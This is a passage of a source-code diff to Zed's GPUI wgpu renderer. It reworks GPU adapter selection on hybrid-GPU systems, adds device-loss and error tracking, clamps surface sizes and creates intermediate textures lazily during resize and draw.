queue, dual_source_blending) = Self::create_device(&adapter).await?; Ok(Self { @@ -96,6 +110,7 @@ impl WgpuContext { device: Arc::new(device), queue: Arc::new(queue), dual_source_blending, + device_lost, }) } @@ -120,7 +135,9 @@ impl WgpuContext { .request_device(&wgpu::DeviceDescriptor { label: Some("gpui_device"), required_features, - required_limits: wgpu::Limits::downlevel_defaults(), + required_limits: wgpu::Limits::downlevel_defaults() + .using_resolution(adapter.limits()) + .using_alignment(adapter.limits()), memory_hints: wgpu::MemoryHints::MemoryUsage, trace: wgpu::Trace::Off, experimental_features: wgpu::ExperimentalFeatures::disabled(), @@ -132,12 +149,13 @@ impl WgpuContext { } #[cfg(not(target_family = "wasm"))] - pub fn instance() -> wgpu::Instance { - wgpu::Instance::new(&wgpu::InstanceDescriptor { + pub fn instance(display: Box) -> wgpu::Instance { + wgpu::Instance::new(wgpu::InstanceDescriptor { backends: wgpu::Backends::VULKAN | wgpu::Backends::GL, flags: wgpu::InstanceFlags::default(), backend_options: wgpu::BackendOptions::default(), memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(), + display: Some(display), }) } @@ -156,75 +174,176 @@ impl WgpuContext { Ok(()) } + /// Select an adapter and create a device, testing that the surface can actually be configured. + /// This is the only reliable way to determine compatibility on hybrid GPU systems, where + /// adapters may report surface compatibility via get_capabilities() but fail when actually + /// configuring (e.g., NVIDIA reporting Vulkan Wayland support but failing because the + /// Wayland compositor runs on the Intel GPU). #[cfg(not(target_family = "wasm"))] - async fn select_adapter( + async fn select_adapter_and_device( instance: &wgpu::Instance, device_id_filter: Option, - compatible_surface: Option<&wgpu::Surface<'_>>, - ) -> anyhow::Result { + surface: &wgpu::Surface<'_>, + compositor_gpu: Option<&CompositorGpuHint>, + ) -> anyhow::Result<(wgpu::Adapter, wgpu::Device, wgpu::Queue, bool)> { + let mut adapters: Vec<_> = instance.enumerate_adapters(wgpu::Backends::all()).await; + + if adapters.is_empty() { + anyhow::bail!("No GPU adapters found"); + } + if let Some(device_id) = device_id_filter { - let adapters: Vec<_> = instance.enumerate_adapters(wgpu::Backends::all()).await; + log::info!("ZED_DEVICE_ID filter: {:#06x}", device_id); + } - if adapters.is_empty() { - anyhow::bail!("No GPU adapters found"); - } + // Sort adapters into a single priority order. Tiers (from highest to lowest): + // + // 1. ZED_DEVICE_ID match — explicit user override + // 2. Compositor GPU match — the GPU the display server is rendering on + // 3. Device type (Discrete > Integrated > Other > Virtual > Cpu). + // "Other" ranks above "Virtual" because OpenGL seems to count as "Other". + // 4. Backend — prefer Vulkan/Metal/Dx12 over GL/etc. + adapters.sort_by_key(|adapter| { + let info = adapter.get_info(); + + // Backends like OpenGL report device=0 for all adapters, so + // device-based matching is only meaningful when non-zero. + let device_known = info.device != 0; + + let user_override: u8 = match device_id_filter { + Some(id) if device_known && info.device == id => 0, + _ => 1, + }; + + let compositor_match: u8 = match compositor_gpu { + Some(hint) + if device_known + && info.vendor == hint.vendor_id + && info.device == hint.device_id => + { + 0 + } + _ => 1, + }; + + let type_priority: u8 = match info.device_type { + wgpu::DeviceType::DiscreteGpu => 0, + wgpu::DeviceType::IntegratedGpu => 1, + wgpu::DeviceType::Other => 2, + wgpu::DeviceType::VirtualGpu => 3, + wgpu::DeviceType::Cpu => 4, + }; + + let backend_priority: u8 = match info.backend { + wgpu::Backend::Vulkan => 0, + wgpu::Backend::Metal => 0, + wgpu::Backend::Dx12 => 0, + _ => 1, + }; + + ( + user_override, + compositor_match, + type_priority, + backend_priority, + ) + }); + + // Log all available adapters (in sorted order) + log::info!("Found {} GPU adapter(s):", adapters.len()); + for adapter in &adapters { + let info = adapter.get_info(); + log::info!( + " - {} (vendor={:#06x}, device={:#06x}, backend={:?}, type={:?})", + info.name, + info.vendor, + info.device, + info.backend, + info.device_type, + ); + } - let mut non_matching_adapter_infos: Vec = Vec::new(); - - for adapter in adapters.into_iter() { - let info = adapter.get_info(); - if info.device == device_id { - if let Some(surface) = compatible_surface { - let caps = surface.get_capabilities(&adapter); - if caps.formats.is_empty() { - log::warn!( - "GPU matching ZED_DEVICE_ID={:#06x} ({}) is not compatible \ - with the display surface. Falling back to auto-selection.", - device_id, - info.name, - ); - break; - } - } + // Test each adapter by creating a device and configuring the surface + for adapter in adapters { + let info = adapter.get_info(); + log::info!("Testing adapter: {} ({:?})...", info.name, info.backend); + + match Self::try_adapter_with_surface(&adapter, surface).await { + Ok((device, queue, dual_source_blending)) => { + log::info!( + "Selected GPU (passed configuration test): {} ({:?})", + info.name, + info.backend + ); + return Ok((adapter, device, queue, dual_source_blending)); + } + Err(e) => { log::info!( - "Found GPU matching ZED_DEVICE_ID={:#06x}: {}", - device_id, - info.name + " Adapter {} ({:?}) failed: {}, trying next...", + info.name, + info.backend, + e ); - return Ok(adapter); - } else { - non_matching_adapter_infos.push(info); } } + } - log::warn!( - "No compatible GPU found matching ZED_DEVICE_ID={:#06x}. Available devices:", - device_id - ); + anyhow::bail!("No GPU adapter found that can configure the display surface") + } - for info in &non_matching_adapter_infos { - log::warn!( - " - {} (device_id={:#06x}, backend={})", - info.name, - info.device, - info.backend - ); - } + /// Try to use an adapter with a surface by creating a device and testing configuration. + /// Returns the device and queue if successful, allowing them to be reused. + #[cfg(not(target_family = "wasm"))] + async fn try_adapter_with_surface( + adapter: &wgpu::Adapter, + surface: &wgpu::Surface<'_>, + ) -> anyhow::Result<(wgpu::Device, wgpu::Queue, bool)> { + let caps = surface.get_capabilities(adapter); + if caps.formats.is_empty() { + anyhow::bail!("no compatible surface formats"); + } + if caps.alpha_modes.is_empty() { + anyhow::bail!("no compatible alpha modes"); } - instance - .request_adapter(&wgpu::RequestAdapterOptions { - power_preference: wgpu::PowerPreference::HighPerformance, - compatible_surface, - force_fallback_adapter: false, - }) - .await - .map_err(|e| anyhow::anyhow!("Failed to request GPU adapter: {e}")) + let (device, queue, dual_source_blending) = Self::create_device(adapter).await?; + let error_scope = device.push_error_scope(wgpu::ErrorFilter::Validation); + + let test_config = wgpu::SurfaceConfiguration { + usage: wgpu::TextureUsages::RENDER_ATTACHMENT, + format: caps.formats[0], + width: 64, + height: 64, + present_mode: wgpu::PresentMode::Fifo, + desired_maximum_frame_latency: 2, + alpha_mode: caps.alpha_modes[0], + view_formats: vec![], + }; + + surface.configure(&device, &test_config); + + let error = error_scope.pop().await; + if let Some(e) = error { + anyhow::bail!("surface configuration failed: {e}"); + } + + Ok((device, queue, dual_source_blending)) } pub fn supports_dual_source_blending(&self) -> bool { self.dual_source_blending } + + /// Returns true if the GPU device was lost (e.g., due to driver crash, suspend/resume). + /// When this returns true, the context should be recreated. + pub fn device_lost(&self) -> bool { + self.device_lost.load(Ordering::Relaxed) + } + + /// Returns a clone of the device_lost flag for sharing with renderers. + pub(crate) fn device_lost_flag(&self) -> Arc { + Arc::clone(&self.device_lost) + } } #[cfg(not(target_family = "wasm"))] diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index 489f354c691c280a5331e5a7765c9d626064eb9c..c25cba935447d76f0e112079b7c81a9463109806 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -1,14 +1,17 @@ -use crate::{WgpuAtlas, WgpuContext}; +use crate::{CompositorGpuHint, WgpuAtlas, WgpuContext}; use bytemuck::{Pod, Zeroable}; use gpui::{ AtlasTextureId, Background, Bounds, DevicePixels, GpuSpecs, MonochromeSprite, Path, Point, PolychromeSprite, PrimitiveBatch, Quad, ScaledPixels, Scene, Shadow, Size, SubpixelSprite, Underline, get_gamma_correction_ratios, }; +use log::warn; #[cfg(not(target_family = "wasm"))] use raw_window_handle::{HasDisplayHandle, HasWindowHandle}; +use std::cell::RefCell; use std::num::NonZeroU64; -use std::sync::Arc; +use std::rc::Rc; +use std::sync::{Arc, Mutex}; #[repr(C)] #[derive(Clone, Copy, Pod, Zeroable)] @@ -68,6 +71,13 @@ struct PathRasterizationVertex { pub struct WgpuSurfaceConfig { pub size: Size, pub transparent: bool, + /// Preferred presentation mode. When `Some`, the renderer will use this + /// mode if supported by the surface, falling back to `Fifo`. + /// When `None`, defaults to `Fifo` (VSync). + /// + /// Mobile platforms may prefer `Mailbox` (triple-buffering) to avoid + /// blocking in `get_current_texture()` during lifecycle transitions. + pub preferred_present_mode: Option, } struct WgpuPipelines { @@ -90,56 +100,93 @@ struct WgpuBindGroupLayouts { surfaces: wgpu::BindGroupLayout, } -pub struct WgpuRenderer { +/// Shared GPU context reference, used to coordinate device recovery across multiple windows. +pub type GpuContext = Rc>>; + +/// GPU resources that must be dropped together during device recovery. +struct WgpuResources { device: Arc, queue: Arc, surface: wgpu::Surface<'static>, - surface_config: wgpu::SurfaceConfiguration, pipelines: WgpuPipelines, bind_group_layouts: WgpuBindGroupLayouts, - atlas: Arc, atlas_sampler: wgpu::Sampler, globals_buffer: wgpu::Buffer, - path_globals_offset: u64, - gamma_offset: u64, globals_bind_group: wgpu::BindGroup, path_globals_bind_group: wgpu::BindGroup, instance_buffer: wgpu::Buffer, + path_intermediate_texture: Option, + path_intermediate_view: Option, + path_msaa_texture: Option, + path_msaa_view: Option, +} + +pub struct WgpuRenderer { + /// Shared GPU context for device recovery coordination (unused on WASM). + #[allow(dead_code)] + context: Option, + /// Compositor GPU hint for adapter selection (unused on WASM). + #[allow(dead_code)] + compositor_gpu: Option, + resources: Option, + surface_config: wgpu::SurfaceConfiguration, + atlas: Arc, + path_globals_offset: u64, + gamma_offset: u64, instance_buffer_capacity: u64, max_buffer_size: u64, storage_buffer_alignment: u64, - path_intermediate_texture: wgpu::Texture, - path_intermediate_view: wgpu::TextureView, - path_msaa_texture: Option, - path_msaa_view: Option, rendering_params: RenderingParameters, dual_source_blending: bool, adapter_info: wgpu::AdapterInfo, transparent_alpha_mode: wgpu::CompositeAlphaMode, opaque_alpha_mode: wgpu::CompositeAlphaMode, + max_texture_size: u32, + last_error: Arc>>, + failed_frame_count: u32, + device_lost: std::sync::Arc, + surface_configured: bool, } impl WgpuRenderer { + fn resources(&self) -> &WgpuResources { + self.resources + .as_ref() + .expect("GPU resources not available") + } + + fn resources_mut(&mut self) -> &mut WgpuResources { + self.resources + .as_mut() + .expect("GPU resources not available") + } + /// Creates a new WgpuRenderer from raw window handles. /// + /// The `gpu_context` is a shared reference that coordinates GPU context across + /// multiple windows. The first window to create a renderer will initialize the + /// context; subsequent windows will share it. + /// /// # Safety /// The caller must ensure that the window handle remains valid for the lifetime /// of the returned renderer. #[cfg(not(target_family = "wasm"))] - pub fn new( - gpu_context: &mut Option, + pub fn new( + gpu_context: GpuContext, window: &W, config: WgpuSurfaceConfig, - ) -> anyhow::Result { + compositor_gpu: Option, + ) -> anyhow::Result + where + W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static, + { let window_handle = window .window_handle() .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?; - let display_handle = window - .display_handle() - .map_err(|e| anyhow::anyhow!("Failed to get display handle: {e}"))?; let target = wgpu::SurfaceTargetUnsafe::RawHandle { - raw_display_handle: display_handle.as_raw(), + // Fall back to the display handle already provided via InstanceDescriptor::display. + raw_display_handle: None, raw_window_handle: window_handle.as_raw(), }; @@ -147,9 +194,10 @@ impl WgpuRenderer { // The surface must be created with the same instance that will be used for // adapter selection, otherwise wgpu will panic. let instance = gpu_context + .borrow() .as_ref() .map(|ctx| ctx.instance.clone()) - .unwrap_or_else(WgpuContext::instance); + .unwrap_or_else(|| WgpuContext::instance(Box::new(window.clone()))); // Safety: The caller guarantees that the window handle is valid for the // lifetime of this renderer. In practice, the RawWindow struct is created @@ -160,15 +208,28 @@ impl WgpuRenderer { .map_err(|e| anyhow::anyhow!("Failed to create surface: {e}"))? }; - let context = match gpu_context { + let mut ctx_ref = gpu_context.borrow_mut(); + let context = match ctx_ref.as_mut() { Some(context) => { context.check_compatible_with_surface(&surface)?; context } - None => gpu_context.insert(WgpuContext::new(instance, &surface)?), + None => ctx_ref.insert(WgpuContext::new(instance, &surface, compositor_gpu)?), }; - Self::new_with_surface(context, surface, config) + let atlas = Arc::new(WgpuAtlas::new( + Arc::clone(&context.device), + Arc::clone(&context.queue), + )); + + Self::new_internal( + Some(Rc::clone(&gpu_context)), + context, + surface, + config, + compositor_gpu, + atlas, + ) } #[cfg(target_family = "wasm")] @@ -181,13 +242,22 @@ impl WgpuRenderer { .instance .create_surface(wgpu::SurfaceTarget::Canvas(canvas.clone())) .map_err(|e| anyhow::anyhow!("Failed to create surface: {e}"))?; - Self::new_with_surface(context, surface, config) + + let atlas = Arc::new(WgpuAtlas::new( + Arc::clone(&context.device), + Arc::clone(&context.queue), + )); + + Self::new_internal(None, context, surface, config, None, atlas) } - pub fn new_with_surface( + fn new_internal( + gpu_context: Option, context: &WgpuContext, surface: wgpu::Surface<'static>, config: WgpuSurfaceConfig, + compositor_gpu: Option, + atlas: Arc, ) -> anyhow::Result { let surface_caps = surface.get_capabilities(&context.adapter); let preferred_formats = [ @@ -238,19 +308,39 @@ impl WgpuRenderer { opaque_alpha_mode }; + let device = Arc::clone(&context.device); + let max_texture_size = device.limits().max_texture_dimension_2d; + + let requested_width = config.size.width.0 as u32; + let requested_height = config.size.height.0 as u32; + let clamped_width = requested_width.min(max_texture_size); + let clamped_height = requested_height.min(max_texture_size); + + if clamped_width != requested_width || clamped_height != requested_height { + warn!( + "Requested surface size ({}, {}) exceeds maximum texture dimension {}. \ + Clamping to ({}, {}). Window content may not fill the entire window.", + requested_width, requested_height, max_texture_size, clamped_width, clamped_height + ); + } + let surface_config = wgpu::SurfaceConfiguration { usage: wgpu::TextureUsages::RENDER_ATTACHMENT, format: surface_format, - width: config.size.width.0 as u32, - height: config.size.height.0 as u32, - present_mode: wgpu::PresentMode::Fifo, + width: clamped_width.max(1), + height: clamped_height.max(1), + present_mode: config + .preferred_present_mode + .filter(|mode| surface_caps.present_modes.contains(mode)) + .unwrap_or(wgpu::PresentMode::Fifo), desired_maximum_frame_latency: 2, alpha_mode, view_formats: vec![], }; + // Configure the surface immediately. The adapter selection process already validated + // that this adapter can successfully configure this surface. surface.configure(&context.device, &surface_config); - let device = Arc::clone(&context.device); let queue = Arc::clone(&context.queue); let dual_source_blending = context.supports_dual_source_blending(); @@ -265,7 +355,6 @@ impl WgpuRenderer { dual_source_blending, ); - let atlas = Arc::new(WgpuAtlas::new(Arc::clone(&device), Arc::clone(&queue))); let atlas_sampler = device.create_sampler(&wgpu::SamplerDescriptor { label: Some("atlas_sampler"), mag_filter: wgpu::FilterMode::Linear, @@ -296,23 +385,6 @@ impl WgpuRenderer { mapped_at_creation: false, }); - let (path_intermediate_texture, path_intermediate_view) = Self::create_path_intermediate( - &device, - surface_format, - config.size.width.0 as u32, - config.size.height.0 as u32, - ); - - let (path_msaa_texture, path_msaa_view) = Self::create_msaa_if_needed( - &device, - surface_format, - config.size.width.0 as u32, - config.size.height.0 as u32, - rendering_params.path_sample_count, - ) - .map(|(t, v)| (Some(t), Some(v))) - .unwrap_or((None, None)); - let globals_bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor { label: Some("globals_bind_group"), layout: &bind_group_layouts.globals, @@ -361,33 +433,53 @@ impl WgpuRenderer { let adapter_info = context.adapter.get_info(); - Ok(Self { + let last_error: Arc>> = Arc::new(Mutex::new(None)); + let last_error_clone = Arc::clone(&last_error); + device.on_uncaptured_error(Arc::new(move |error| { + let mut guard = last_error_clone.lock().unwrap(); + *guard = Some(error.to_string()); + })); + + let resources = WgpuResources { device, queue, surface, - surface_config, pipelines, bind_group_layouts, - atlas, atlas_sampler, globals_buffer, - path_globals_offset, - gamma_offset, globals_bind_group, path_globals_bind_group, instance_buffer, + // Defer intermediate texture creation to first draw call via ensure_intermediate_textures(). + // This avoids panics when the device/surface is in an invalid state during initialization. + path_intermediate_texture: None, + path_intermediate_view: None, + path_msaa_texture: None, + path_msaa_view: None, + }; + + Ok(Self { + context: gpu_context, + compositor_gpu, + resources: Some(resources), + surface_config, + atlas, + path_globals_offset, + gamma_offset, instance_buffer_capacity: initial_instance_buffer_capacity, max_buffer_size, storage_buffer_alignment, - path_intermediate_texture, - path_intermediate_view, - path_msaa_texture, - path_msaa_view, rendering_params, dual_source_blending, adapter_info, transparent_alpha_mode, opaque_alpha_mode, + max_texture_size, + last_error, + failed_frame_count: 0, + device_lost: context.device_lost_flag(), + surface_configured: true, }) } @@ -523,6 +615,28 @@ impl WgpuRenderer { path_sample_count: u32, dual_source_blending: bool, ) -> WgpuPipelines { + // Diagnostic guard: verify the device actually has + // DUAL_SOURCE_BLENDING. We have a crash report (ZED-5G1) where a + // feature mismatch caused a wgpu-hal abort, but we haven't + // identified the code path that produces the mismatch. This + // guard prevents the crash and logs more evidence. + // Remove this check once: + // a) We find and fix the root cause, or + // b) There are no reports of this warning appearing for some time. + let device_has_feature = device + .features() + .contains(wgpu::Features::DUAL_SOURCE_BLENDING); + if dual_source_blending && !device_has_feature { + log::error!( + "BUG: dual_source_blending flag is true but device does not \ + have DUAL_SOURCE_BLENDING enabled (device features: {:?}). \ + Falling back to mono text rendering. Please report this at \ + https://github.com/zed-industries/zed/issues", + device.features(), + ); + } + let dual_source_blending = dual_source_blending && device_has_feature; + let base_shader_source = include_str!("shaders.wgsl"); let shader_module = device.create_shader_module(wgpu::ShaderModuleDescriptor { label: Some("gpui_shaders"), @@ -566,7 +680,7 @@ impl WgpuRenderer { module: &wgpu::ShaderModule| { let pipeline_layout = device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor { label: Some(&format!("{name}_layout")), - bind_group_layouts: &[globals_layout, data_layout], + bind_group_layouts: &[Some(globals_layout), Some(data_layout)], immediate_size: 0, }); @@ -825,32 +939,79 @@ impl WgpuRenderer { let height = size.height.0 as u32; if width != self.surface_config.width || height != self.surface_config.height { - self.surface_config.width = width.max(1); - self.surface_config.height = height.max(1); - self.surface.configure(&self.device, &self.surface_config); - - let (path_intermediate_texture, path_intermediate_view) = - Self::create_path_intermediate( - &self.device, - self.surface_config.format, - self.surface_config.width, - self.surface_config.height, + let clamped_width = width.min(self.max_texture_size); + let clamped_height = height.min(self.max_texture_size); + + if clamped_width != width || clamped_height != height { + warn!( + "Requested surface size ({}, {}) exceeds maximum texture dimension {}. \ + Clamping to ({}, {}). Window content may not fill the entire window.", + width, height, self.max_texture_size, clamped_width, clamped_height ); - self.path_intermediate_texture = path_intermediate_texture; - self.path_intermediate_view = path_intermediate_view; - - let (path_msaa_texture, path_msaa_view) = Self::create_msaa_if_needed( - &self.device, - self.surface_config.format, - self.surface_config.width, - self.surface_config.height, - self.rendering_params.path_sample_count, - ) - .map(|(t, v)| (Some(t), Some(v))) - .unwrap_or((None, None)); - self.path_msaa_texture = path_msaa_texture; - self.path_msaa_view = path_msaa_view; + } + + self.surface_config.width = clamped_width.max(1); + self.surface_config.height = clamped_height.max(1); + let surface_config = self.surface_config.clone(); + + let resources = self.resources_mut(); + + // Wait for any in-flight GPU work to complete before destroying textures + if let Err(e) = resources.device.poll(wgpu::PollType::Wait { + submission_index: None, + timeout: None, + }) { + warn!("Failed to poll device during resize: {e:?}"); + } + + // Destroy old textures before allocating new ones to avoid GPU memory spikes + if let Some(ref texture) = resources.path_intermediate_texture { + texture.destroy(); + } + if let Some(ref texture) = resources.path_msaa_texture { + texture.destroy(); + } + + resources + .surface + .configure(&resources.device, &surface_config); + + // Invalidate intermediate textures - they will be lazily recreated + // in draw() after we confirm the surface is healthy. This avoids + // panics when the device/surface is in an invalid state during resize. + resources.path_intermediate_texture = None; + resources.path_intermediate_view = None; + resources.path_msaa_texture = None; + resources.path_msaa_view = None; + } + } + + fn ensure_intermediate_textures(&mut self) { + if self.resources().path_intermediate_texture.is_some() { + return; } + + let format = self.surface_config.format; + let width = self.surface_config.width; + let height = self.surface_config.height; + let path_sample_count = self.rendering_params.path_sample_count; + let resources = self.resources_mut(); + + let (t, v) = Self::create_path_intermediate(&resources.device, format, width, height); + resources.path_intermediate_texture = Some(t); + resources.path_intermediate_view = Some(v); + + let (path_msaa_texture, path_msaa_view) = Self::create_msaa_if_needed( + &resources.device, + format, + width, + height, + path_sample_count, + ) + .map(|(t, v)| (Some(t), Some(v))) + .unwrap_or((None, None)); + resources.path_msaa_texture = path_msaa_texture; + resources.path_msaa_view = path_msaa_view; } pub fn update_transparency(&mut self, transparent: bool) { @@ -862,14 +1023,20 @@ impl WgpuRenderer { if new_alpha_mode != self.surface_config.alpha_mode { self.surface_config.alpha_mode = new_alpha_mode; - self.surface.configure(&self.device, &self.surface_config); - self.pipelines = Self::create_pipelines( - &self.device, - &self.bind_group_layouts, - self.surface_config.format, - self.surface_config.alpha_mode, - self.rendering_params.path_sample_count, - self.dual_source_blending, + let surface_config = self.surface_config.clone(); + let path_sample_count = self.rendering_params.path_sample_count; + let dual_source_blending = self.dual_source_blending; + let resources = self.resources_mut(); + resources + .surface + .configure(&resources.device, &surface_config); + resources.pipelines = Self::create_pipelines( + &resources.device, + &resources.bind_group_layouts, + surface_config.format, + surface_config.alpha_mode, + path_sample_count, + dual_source_blending, ); } } @@ -899,20 +1066,68 @@ impl WgpuRenderer { } } + pub fn max_texture_size(&self) -> u32 { + self.max_texture_size + } + pub fn draw(&mut self, scene: &Scene) { + // Bail out early if the surface has been unconfigured (e.g. during + // Android background/rotation transitions). Attempting to acquire + // a texture from an unconfigured surface can block indefinitely on + // some drivers (Adreno). + if !self.surface_configured { + return; + } + + let last_error = self.last_error.lock().unwrap().take(); + if let Some(error) = last_error { + self.failed_frame_count += 1; + log::error!( + "GPU error during frame (failure {} of 20): {error}", + self.failed_frame_count + ); + if self.failed_frame_count > 20 { + panic!("Too many consecutive GPU errors. Last error: {error}"); + } + } else { + self.failed_frame_count = 0; + } + self.atlas.before_frame(); - let frame = match self.surface.get_current_texture() { - Ok(frame) => frame, - Err(wgpu::SurfaceError::Lost | wgpu::SurfaceError::Outdated) => { - self.surface.configure(&self.device, &self.surface_config); + let frame = match self.resources().surface.get_current_texture() { + wgpu::CurrentSurfaceTexture::Success(frame) => frame, + wgpu::CurrentSurfaceTexture::Suboptimal(frame) => { + // Textures must be destroyed before the surface can be reconfigured. + drop(frame); + let surface_config = self.surface_config.clone(); + let resources = self.resources_mut(); + resources + .surface + .configure(&resources.device, &surface_config); + return; + } + wgpu::CurrentSurfaceTexture::Lost | wgpu::CurrentSurfaceTexture::Outdated => { + let surface_config = self.surface_config.clone(); + let resources = self.resources_mut(); + resources + .surface + .configure(&resources.device, &surface_config); + return; + } + wgpu::CurrentSurfaceTexture::Timeout | wgpu::CurrentSurfaceTexture::Occluded => { return; } - Err(e) => { - log::error!("Failed to acquire surface texture: {e}"); + wgpu::CurrentSurfaceTexture::Validation => { + *self.last_error.lock().unwrap() = + Some("Surface texture validation error".to_string()); return; } }; + + // Now that we know the surface is healthy, ensure intermediate textures exist + self.ensure_intermediate_textures(); + let frame_view = frame .texture .create_view(&wgpu::TextureViewDescriptor::default()); @@ -944,28 +1159,35 @@ impl WgpuRenderer { ..globals }; - self.queue - .write_buffer(&self.globals_buffer, 0, bytemuck::bytes_of(&globals)); - self.queue.write_buffer( - &self.globals_buffer, - self.path_globals_offset, - bytemuck::bytes_of(&path_globals), - ); - self.queue.write_buffer( - &self.globals_buffer, - self.gamma_offset, - bytemuck::bytes_of(&gamma_params), - ); + { + let resources = self.resources(); + resources.queue.write_buffer( + &resources.globals_buffer, + 0, + bytemuck::bytes_of(&globals), + ); + resources.queue.write_buffer( + &resources.globals_buffer, + self.path_globals_offset, + bytemuck::bytes_of(&path_globals), + ); + resources.queue.write_buffer( + &resources.globals_buffer, + self.gamma_offset, + bytemuck::bytes_of(&gamma_params), + ); + } loop { let mut instance_offset: u64 = 0; let mut overflow = false; - let mut encoder = self - .device - .create_command_encoder(&wgpu::CommandEncoderDescriptor { - label: Some("main_encoder"), - }); + let mut encoder = + self.resources() + .device + .create_command_encoder(&wgpu::CommandEncoderDescriptor { + label: Some("main_encoder"), + }); { let mut pass = encoder.begin_render_pass(&wgpu::RenderPassDescriptor { @@ -1085,7 +1307,9 @@ impl WgpuRenderer { continue; } - self.queue.submit(std::iter::once(encoder.finish())); + self.resources() + .queue + .submit(std::iter::once(encoder.finish())); frame.present(); return; } @@ -1101,7 +1325,7 @@ impl WgpuRenderer { self.draw_instances( data, quads.len() as u32, - &self.pipelines.quads, + &self.resources().pipelines.quads, instance_offset, pass, ) @@ -1117,7 +1341,7 @@ impl WgpuRenderer { self.draw_instances( data, shadows.len() as u32, - &self.pipelines.shadows, + &self.resources().pipelines.shadows, instance_offset, pass, ) @@ -1133,7 +1357,7 @@ impl WgpuRenderer { self.draw_instances( data, underlines.len() as u32, - &self.pipelines.underlines, + &self.resources().pipelines.underlines, instance_offset, pass, ) @@ -1152,7 +1376,7 @@ impl WgpuRenderer { data, sprites.len() as u32, &tex_info.view, - &self.pipelines.mono_sprites, + &self.resources().pipelines.mono_sprites, instance_offset, pass, ) @@ -1167,11 +1391,12 @@ impl WgpuRenderer { ) -> bool { let tex_info = self.atlas.get_texture_info(texture_id); let data = unsafe { Self::instance_bytes(sprites) }; - let pipeline = self + let resources = self.resources(); + let pipeline = resources .pipelines .subpixel_sprites .as_ref() - .unwrap_or(&self.pipelines.mono_sprites); + .unwrap_or(&resources.pipelines.mono_sprites); self.draw_instances_with_texture( data, sprites.len() as u32, @@ -1195,7 +1420,7 @@ impl WgpuRenderer { data, sprites.len() as u32, &tex_info.view, - &self.pipelines.poly_sprites, + &self.resources().pipelines.poly_sprites, instance_offset, pass, ) @@ -1215,16 +1440,19 @@ impl WgpuRenderer { let Some((offset, size)) = self.write_to_instance_buffer(instance_offset, data) else { return false; }; - let bind_group = self.device.create_bind_group(&wgpu::BindGroupDescriptor { - label: None, - layout: &self.bind_group_layouts.instances, - entries: &[wgpu::BindGroupEntry { - binding: 0, - resource: self.instance_binding(offset, size), - }], - }); + let resources = self.resources(); + let bind_group = resources + .device + .create_bind_group(&wgpu::BindGroupDescriptor { + label: None, + layout: &resources.bind_group_layouts.instances, + entries: &[wgpu::BindGroupEntry { + binding: 0, + resource: self.instance_binding(offset, size), + }], + }); pass.set_pipeline(pipeline); - pass.set_bind_group(0, &self.globals_bind_group, &[]); + pass.set_bind_group(0, &resources.globals_bind_group, &[]); pass.set_bind_group(1, &bind_group, &[]); pass.draw(0..4, 0..instance_count); true @@ -1245,26 +1473,29 @@ impl WgpuRenderer { let Some((offset, size)) = self.write_to_instance_buffer(instance_offset, data) else { return false; }; - let bind_group = self.device.create_bind_group(&wgpu::BindGroupDescriptor { - label: None, - layout: &self.bind_group_layouts.instances_with_texture, - entries: &[ - wgpu::BindGroupEntry { - binding: 0, - resource: self.instance_binding(offset, size), - }, - wgpu::BindGroupEntry { - binding: 1, - resource: wgpu::BindingResource::TextureView(texture_view), - }, - wgpu::BindGroupEntry { - binding: 2, - resource: wgpu::BindingResource::Sampler(&self.atlas_sampler), - }, - ], - }); + let resources = self.resources(); + let bind_group = resources + .device + .create_bind_group(&wgpu::BindGroupDescriptor { + label: None, + layout: &resources.bind_group_layouts.instances_with_texture, + entries: &[ + wgpu::BindGroupEntry { + binding: 0, + resource: self.instance_binding(offset, size), + }, + wgpu::BindGroupEntry { + binding: 1, + resource: wgpu::BindingResource::TextureView(texture_view), + }, + wgpu::BindGroupEntry { + binding: 2, + resource: wgpu::BindingResource::Sampler(&resources.atlas_sampler), + }, + ], + }); pass.set_pipeline(pipeline); - pass.set_bind_group(0, &self.globals_bind_group, &[]); + pass.set_bind_group(0, &resources.globals_bind_group, &[]); pass.set_bind_group(1, &bind_group, &[]); pass.draw(0..4, 0..instance_count); true @@ -1302,12 +1533,17 @@ impl WgpuRenderer { vec![PathSprite { bounds }] }; + let resources = self.resources(); + let Some(path_intermediate_view) = resources.path_intermediate_view.as_ref() else { + return true; + }; + let sprite_data = unsafe { Self::instance_bytes(&sprites) }; self.draw_instances_with_texture( sprite_data, sprites.len() as u32, - &self.path_intermediate_view, - &self.pipelines.paths, + path_intermediate_view, + &resources.pipelines.paths, instance_offset, pass, ) @@ -1341,19 +1577,26 @@ impl WgpuRenderer { return false; }; - let data_bind_group = self.device.create_bind_group(&wgpu::BindGroupDescriptor { - label: Some("path_rasterization_bind_group"), - layout: &self.bind_group_layouts.instances, - entries: &[wgpu::BindGroupEntry { - binding: 0, - resource: self.instance_binding(vertex_offset, vertex_size), - }], - }); + let resources = self.resources(); + let data_bind_group = resources + .device + .create_bind_group(&wgpu::BindGroupDescriptor { + label: Some("path_rasterization_bind_group"), + layout: &resources.bind_group_layouts.instances, + entries: &[wgpu::BindGroupEntry { + binding: 0, + resource: self.instance_binding(vertex_offset, vertex_size), + }], + }); + + let Some(path_intermediate_view) = resources.path_intermediate_view.as_ref() else { + return true; + }; - let (target_view, resolve_target) = if let Some(ref msaa_view) = self.path_msaa_view { - (msaa_view, Some(&self.path_intermediate_view)) + let (target_view, resolve_target) = if let Some(ref msaa_view) = resources.path_msaa_view { + (msaa_view, Some(path_intermediate_view)) } else { - (&self.path_intermediate_view, None) + (path_intermediate_view, None) }; { @@ -1372,8 +1615,8 @@ impl WgpuRenderer { ..Default::default() }); - pass.set_pipeline(&self.pipelines.path_rasterization); - pass.set_bind_group(0, &self.path_globals_bind_group, &[]); + pass.set_pipeline(&resources.pipelines.path_rasterization); + pass.set_bind_group(0, &resources.path_globals_bind_group, &[]); pass.set_bind_group(1, &data_bind_group, &[]); pass.draw(0..vertices.len() as u32, 0..1); } @@ -1384,7 +1627,8 @@ impl WgpuRenderer { fn grow_instance_buffer(&mut self) { let new_capacity = (self.instance_buffer_capacity * 